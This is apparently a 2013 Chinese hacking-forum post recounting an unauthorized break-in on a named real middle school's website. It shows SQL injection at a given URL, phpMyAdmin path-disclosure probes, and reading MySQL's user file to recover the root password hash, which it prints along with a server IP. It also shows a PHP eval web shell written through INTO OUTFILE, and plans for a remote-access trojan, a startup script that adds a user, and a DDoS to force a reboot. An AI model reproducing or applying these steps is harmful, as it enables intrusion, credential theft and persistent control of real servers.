找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2594|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏0 z4 s5 ]$ Z- p) t2 p
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!4 k" ~/ v( I( C0 {/ h) i& A- u
& v  Z' \# L' b
( ]; D; X1 A0 Z. z3 y7 y

9 `& B- @9 ]3 b- |4 l/ e常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 + a$ ^( m# q+ m6 c

8 X' G/ T. \9 H! v8 z那么想可以直接写入shell ,getshell有几个条件:
- s- W5 m% e; m$ O1 G! ^
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF2 t5 j$ g2 U# l) X+ Y+ _3 V7 p

9 w" W1 G  n5 d试着爆绝对路径:
/ q  Q- `  S3 P* G+ |8 `( r* G, }1./phpMyAdmin/index.php?lang[]=1  
% J7 O. `+ @9 ?8 \4 A, n, Z/ _2./phpMyAdmin/phpinfo.php  ( Q! i+ V5 s" U
3./load_file()  0 r" u* {1 s8 x, u, m
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  % |+ @. b2 D" w$ P; u. R( A8 L3 \
5./phpmyadmin/libraries/select_lang.lib.php  ! t4 E+ T+ b" z! @
6./phpmyadmin/libraries/lect_lang.lib.php  
  y. f% |6 `, s4 }% X- F/ N7./phpmyadmin/libraries/mcrypt.lib.php   
* a$ i) X/ z% N/ _8./phpmyadmin/libraries/export/xls.php  % i. m/ v- U, V$ |4 a  m
0 A) _, {. V3 b. q- ~
均不行...........................
. H5 r+ o# L( a% ]+ X, b, G: F8 n# k7 B7 q
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
' V: B8 ?; ^4 E% K8 o% T' D6 G5 a: Q+ N7 y
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 2 I3 z+ z6 y$ K4 U1 V
& w4 t1 @; f% u: i
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败" U% `" [! R. s0 ]7 V

; y6 h; x, `. o/ }敏感东西:http://202.103.49.66/Admincp.php  社工进不去..........." j7 v5 r4 U% G) c) S8 K% Z4 M
8 Q; m/ u9 E( z5 @, B
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
) v9 K4 S) w! x& L" @. @, s# S9 [* o4 A9 t8 F
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 8 [  A# V4 M( X9 {5 }+ S
+ x+ J7 _9 q* w3 a
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD / z% P- f: d& i/ c( j1 ]
) \6 E$ ?% q# Y3 q5 N
成功读到root密码:
/ ]- ~7 s1 X$ }; S$ Y
" p1 N* v5 h& b, o17---- r(0072)/ k$ n+ _1 j% }5 ?( I, U1 D
18---- o(006f)5 P( Z, o9 y, t$ f# V) J. \
19---- o(006f)) r( n7 j, h/ ^' a! Q# F6 y
20---- t(0074)# C( N: Y( U8 H
21---- *(002a)' p/ Y# O+ H6 u0 s% Q" ~
22---- 8(0038)
- G% ~+ a0 m8 q23---- 2(0032)3 @! j! L0 w9 A$ {. J
24---- E(0045)# U9 q4 H; C% L3 O; `1 m
25---- 1(0031)7 w/ I8 o9 {+ Y5 b" A1 p: N
26---- C(0043)7 j( Z9 E% q7 q4 d) t; E
27---- 5(0035)
0 A, Z: P1 k$ \( `28---- 8(0038)4 |7 i4 }: s6 C* r( l
29---- 2(0032)* Q5 D0 ?- |5 V6 w2 p9 y* G
30---- 8(0038)# e& s6 _7 {$ }" z4 w
31---- A(0041): o8 ~/ ~9 y2 D: h9 w
32---- 9(0039)  R9 \1 X8 X3 d
33---- B(0042)+ J' x0 R) w7 c; {9 r2 B* V& m1 N! {
34---- 5(0035)
% A" I3 n- l8 D) L7 S0 i, `35---- 4(0034)
% b2 Z5 \9 p: o, i36---- 8(0038)
; ~) e) b9 w+ V2 l37---- 6(0036); L# r" M  ~% t1 w% D5 y
38---- 4(0034)$ F+ ^( Y& k* e' v2 L
39---- 9(0039)
. v+ i7 q8 }" ]+ d40---- 1(0031)
2 X3 m6 W$ t1 k' X* t/ \41---- 1(0031)
) }+ i$ d1 ^" W42---- 5(0035)3 J7 L( y+ G' E" |2 j$ x
43---- 3(0033)
7 H4 R% k$ g. G/ e44---- 5(0035)- ^7 `" G% Q) x1 S6 n$ `
45---- 9(0039)
+ J! H' z& ?/ I46---- 8(0038)
" ?( h1 V+ |9 k) U" |) X47---- F(0046)
$ ]# J! [, X6 z! [% A48---- F(0046)
) \; s. |3 x7 k2 \) p( X/ c49---- 4(0034)
; _! C" e1 B1 c/ U50---- F(0046)
! w0 U% s9 S- Y51---- 0(0030)
4 Z% L3 Y" |3 M: Q52---- 3(0033)
! K; O( }+ m, j4 f$ `) k53---- 2(0032)+ G2 C8 a: I) u/ O$ `/ i
54---- A(0041)
7 d+ _% a6 }: v55---- 4(0034)* P: F5 A& X; [2 p8 Z
56---- A(0041)+ f8 Y8 T! h6 n9 g
57---- B(0042)
+ r7 t1 f4 h. R, }, Z; V58---- *(0044)2 j1 ~, w3 N: t  q
59---- *(0035): h5 U+ j5 A6 @. Q2 c; k
60---- *(0041)3 j3 x4 J' i1 p9 B! c4 m1 c
61---- *0032)
# _3 R# h* }2 n- _; b' J* ~9 B5 B8 f4 u; F& R0 `
解密后成功登陆phpmyamin
7 ~8 X; m% R% Z# u. e- a- \                          
- D- X. c9 l: ^8 u
% t' m: f0 I3 u1 S9 ?                             $ W9 u/ {, |! \5 V
2 Y, y/ f+ j8 j% @
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'" `* X+ K! c5 C/ _; Z$ `

4 \9 D8 C: Y* v3 W成功执行,拿下shell,菜刀连接:
+ a3 |: z" [' k+ q; }" {
, J. `0 Y6 V9 G* B3 s2 j6 ]- e服务器不支持asp,aspx,php提权无果...................$ `0 V1 ~0 _; x- z# s

: ~5 B8 H# `7 @6 l: ^但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:: u! A. l4 G/ l5 e) A) i
服务器上已经有个隐藏帐号了
# q5 k  z; ~$ m5 c5 ^
别名     administrators
8 p; P6 p* S4 x# d* n注释     管理员对计算机/域有不受限制的完全访问权
1 S. `+ ], F: D$ Z: p2 i9 \9 ]
成员

( Z/ I  I4 R0 q* l5 }9 t+ h. L
-------------------------------------------------------------------------------
; F+ P$ ?- L% s7 ]& L7 Y" yadmin; ?$ |1 N$ c/ U
Administrator
1 _; a# U1 @1 K8 K" H% \slipper$7 z$ y- }( h7 l6 U6 e, F6 q1 H
sqluser
: E. V1 ]( _, e$ \2 x5 s# c& H( Y8 f. X) m( u命令成功完成。 5 l) f/ Q& F; e. q& j; a7 a

9 e2 C5 j4 @8 ^# V1 o5 T4 s服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。0 U( {' }7 n. U. c

: O3 }  V/ u; [+ p( A% vddos服务器重启,不然就只能坐等服务器重启了...............................
& Y0 @2 |6 L  H- f! g; I' N, P+ b: \3 {( R
      

1 r; D% R, f3 |" {7 ?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表